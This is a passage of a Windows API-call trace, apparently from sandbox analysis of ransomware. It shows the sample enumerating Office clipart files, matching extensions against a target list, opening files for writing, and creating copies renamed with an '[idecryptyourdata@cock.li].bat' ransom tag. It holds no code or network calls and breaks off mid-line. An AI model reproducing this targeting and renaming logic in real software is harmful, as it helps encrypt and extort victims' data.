[0173.060] lstrlenW (lpString=".bz2") returned 4 [0173.060] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0173.060] lstrlenW (lpString=".7z") returned 3 [0173.060] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0173.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.060] lstrlenW (lpString=".dbf") returned 4 [0173.060] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.060] lstrlenW (lpString=".1cd") returned 4 [0173.060] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0173.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746G.GIF") returned 68 [0173.061] lstrlenW (lpString=".jpg") returned 4 [0173.061] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0173.061] lstrcmpiW (lpString1=".BMP", lpString2=".bat") returned 1 [0173.061] lstrlenW (lpString="PH02746U.BMP") returned 12 [0173.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.062] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=32132) returned 1 [0173.062] CloseHandle (hObject=0x378) returned 1 [0173.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp")) returned 0x220 [0173.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0173.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.063] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.063] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02746u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.063] CloseHandle (hObject=0x378) returned 1 [0173.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.064] lstrlenW (lpString=".doc") returned 4 [0173.064] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0173.064] lstrlenW (lpString=".docx") returned 5 [0173.064] lstrcmpiW (lpString1=".docx", lpString2="U.BMP") returned -1 [0173.064] lstrlenW (lpString=".pdf") returned 4 [0173.064] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0173.064] lstrlenW (lpString=".xls") returned 4 [0173.064] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0173.064] lstrlenW (lpString=".xlsx") returned 5 [0173.064] lstrcmpiW (lpString1=".xlsx", lpString2="U.BMP") returned -1 [0173.064] lstrlenW (lpString=".ppt") returned 4 [0173.064] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0173.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.064] lstrlenW (lpString=".zip") returned 4 [0173.065] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0173.065] lstrlenW (lpString=".rar") returned 4 [0173.065] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0173.065] lstrlenW (lpString=".bz2") returned 4 [0173.065] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0173.065] lstrlenW (lpString=".7z") returned 3 [0173.065] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0173.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.065] lstrlenW (lpString=".dbf") returned 4 [0173.065] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0173.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.065] lstrlenW (lpString=".1cd") returned 4 [0173.065] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0173.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.065] lstrlenW (lpString=".jpg") returned 4 [0173.065] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0173.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.065] lstrlenW (lpString=".doc") returned 4 [0173.066] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0173.066] lstrlenW (lpString=".docx") returned 5 [0173.066] lstrcmpiW (lpString1=".docx", lpString2="U.BMP") returned -1 [0173.066] lstrlenW (lpString=".pdf") returned 4 [0173.066] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0173.066] lstrlenW (lpString=".xls") returned 4 [0173.066] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0173.066] lstrlenW (lpString=".xlsx") returned 5 [0173.066] lstrcmpiW (lpString1=".xlsx", lpString2="U.BMP") returned -1 [0173.066] lstrlenW (lpString=".ppt") returned 4 [0173.066] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0173.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.066] lstrlenW (lpString=".zip") returned 4 [0173.066] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0173.066] lstrlenW (lpString=".rar") returned 4 [0173.066] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0173.066] lstrlenW (lpString=".bz2") returned 4 [0173.066] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0173.066] lstrlenW (lpString=".7z") returned 3 [0173.066] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0173.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.066] lstrlenW (lpString=".dbf") returned 4 [0173.067] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0173.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.067] lstrlenW (lpString=".1cd") returned 4 [0173.067] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0173.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02746U.BMP") returned 68 [0173.067] lstrlenW (lpString=".jpg") returned 4 [0173.067] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0173.067] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0173.067] lstrlenW (lpString="PH02748G.GIF") returned 12 [0173.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.068] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=24720) returned 1 [0173.068] CloseHandle (hObject=0x378) returned 1 [0173.068] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif")) returned 0x220 [0173.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0173.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.069] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.069] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.070] CloseHandle (hObject=0x378) returned 1 [0173.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.070] lstrlenW (lpString=".doc") returned 4 [0173.070] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0173.070] lstrlenW (lpString=".docx") returned 5 [0173.070] lstrcmpiW (lpString1=".docx", lpString2="G.GIF") returned -1 [0173.070] lstrlenW (lpString=".pdf") returned 4 [0173.070] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0173.070] lstrlenW (lpString=".xls") returned 4 [0173.070] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0173.070] lstrlenW (lpString=".xlsx") returned 5 [0173.070] lstrcmpiW (lpString1=".xlsx", lpString2="G.GIF") returned -1 [0173.070] lstrlenW (lpString=".ppt") returned 4 [0173.071] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0173.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.071] lstrlenW (lpString=".zip") returned 4 [0173.071] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.071] lstrlenW (lpString=".rar") returned 4 [0173.071] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.071] lstrlenW (lpString=".bz2") returned 4 [0173.071] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0173.071] lstrlenW (lpString=".7z") returned 3 [0173.071] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0173.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.071] lstrlenW (lpString=".dbf") returned 4 [0173.071] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.071] lstrlenW (lpString=".1cd") returned 4 [0173.071] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0173.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.071] lstrlenW (lpString=".jpg") returned 4 [0173.071] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0173.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.072] lstrlenW (lpString=".doc") returned 4 [0173.072] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0173.072] lstrlenW (lpString=".docx") returned 5 [0173.072] lstrcmpiW (lpString1=".docx", lpString2="G.GIF") returned -1 [0173.072] lstrlenW (lpString=".pdf") returned 4 [0173.072] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0173.072] lstrlenW (lpString=".xls") returned 4 [0173.072] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0173.072] lstrlenW (lpString=".xlsx") returned 5 [0173.072] lstrcmpiW (lpString1=".xlsx", lpString2="G.GIF") returned -1 [0173.072] lstrlenW (lpString=".ppt") returned 4 [0173.072] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0173.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.072] lstrlenW (lpString=".zip") returned 4 [0173.072] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.072] lstrlenW (lpString=".rar") returned 4 [0173.073] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.073] lstrlenW (lpString=".bz2") returned 4 [0173.073] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0173.073] lstrlenW (lpString=".7z") returned 3 [0173.073] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0173.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.073] lstrlenW (lpString=".dbf") returned 4 [0173.073] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.073] lstrlenW (lpString=".1cd") returned 4 [0173.073] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0173.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF") returned 68 [0173.073] lstrlenW (lpString=".jpg") returned 4 [0173.073] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0173.073] lstrcmpiW (lpString1=".BMP", lpString2=".bat") returned 1 [0173.073] lstrlenW (lpString="PH02748U.BMP") returned 12 [0173.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.075] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=32400) returned 1 [0173.075] CloseHandle (hObject=0x378) returned 1 [0173.075] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp")) returned 0x220 [0173.075] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0173.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.076] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.076] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.077] CloseHandle (hObject=0x378) returned 1 [0173.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.077] lstrlenW (lpString=".doc") returned 4 [0173.077] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0173.077] lstrlenW (lpString=".docx") returned 5 [0173.077] lstrcmpiW (lpString1=".docx", lpString2="U.BMP") returned -1 [0173.077] lstrlenW (lpString=".pdf") returned 4 [0173.077] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0173.077] lstrlenW (lpString=".xls") returned 4 [0173.077] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0173.077] lstrlenW (lpString=".xlsx") returned 5 [0173.077] lstrcmpiW (lpString1=".xlsx", lpString2="U.BMP") returned -1 [0173.077] lstrlenW (lpString=".ppt") returned 4 [0173.077] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0173.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.077] lstrlenW (lpString=".zip") returned 4 [0173.077] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0173.078] lstrlenW (lpString=".rar") returned 4 [0173.078] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0173.078] lstrlenW (lpString=".bz2") returned 4 [0173.078] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0173.078] lstrlenW (lpString=".7z") returned 3 [0173.078] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0173.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.078] lstrlenW (lpString=".dbf") returned 4 [0173.078] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0173.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.078] lstrlenW (lpString=".1cd") returned 4 [0173.078] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0173.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.078] lstrlenW (lpString=".jpg") returned 4 [0173.078] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0173.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.078] lstrlenW (lpString=".doc") returned 4 [0173.078] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0173.078] lstrlenW (lpString=".docx") returned 5 [0173.078] lstrcmpiW (lpString1=".docx", lpString2="U.BMP") returned -1 [0173.078] lstrlenW (lpString=".pdf") returned 4 [0173.078] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0173.078] lstrlenW (lpString=".xls") returned 4 [0173.079] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0173.079] lstrlenW (lpString=".xlsx") returned 5 [0173.079] lstrcmpiW (lpString1=".xlsx", lpString2="U.BMP") returned -1 [0173.079] lstrlenW (lpString=".ppt") returned 4 [0173.079] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0173.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.079] lstrlenW (lpString=".zip") returned 4 [0173.079] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0173.079] lstrlenW (lpString=".rar") returned 4 [0173.079] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0173.079] lstrlenW (lpString=".bz2") returned 4 [0173.079] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0173.079] lstrlenW (lpString=".7z") returned 3 [0173.079] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0173.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.079] lstrlenW (lpString=".dbf") returned 4 [0173.079] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0173.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.079] lstrlenW (lpString=".1cd") returned 4 [0173.079] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0173.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 68 [0173.080] lstrlenW (lpString=".jpg") returned 4 [0173.080] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0173.080] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0173.080] lstrlenW (lpString="PH02749G.GIF") returned 12 [0173.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.081] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=34709) returned 1 [0173.081] CloseHandle (hObject=0x378) returned 1 [0173.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif")) returned 0x220 [0173.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0173.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0173.082] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.082] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.083] CloseHandle (hObject=0x378) returned 1 [0173.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.083] lstrlenW (lpString=".doc") returned 4 [0173.083] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0173.083] lstrlenW (lpString=".docx") returned 5 [0173.083] lstrcmpiW (lpString1=".docx", lpString2="G.GIF") returned -1 [0173.083] lstrlenW (lpString=".pdf") returned 4 [0173.083] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0173.083] lstrlenW (lpString=".xls") returned 4 [0173.083] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0173.083] lstrlenW (lpString=".xlsx") returned 5 [0173.083] lstrcmpiW (lpString1=".xlsx", lpString2="G.GIF") returned -1 [0173.170] lstrlenW (lpString=".ppt") returned 4 [0173.170] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0173.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.170] lstrlenW (lpString=".zip") returned 4 [0173.170] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.171] lstrlenW (lpString=".rar") returned 4 [0173.171] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.171] lstrlenW (lpString=".bz2") returned 4 [0173.171] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0173.171] lstrlenW (lpString=".7z") returned 3 [0173.171] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0173.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.171] lstrlenW (lpString=".dbf") returned 4 [0173.171] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.171] lstrlenW (lpString=".1cd") returned 4 [0173.171] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0173.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.171] lstrlenW (lpString=".jpg") returned 4 [0173.171] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0173.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.171] lstrlenW (lpString=".doc") returned 4 [0173.171] lstrcmpiW (lpString1=".doc", 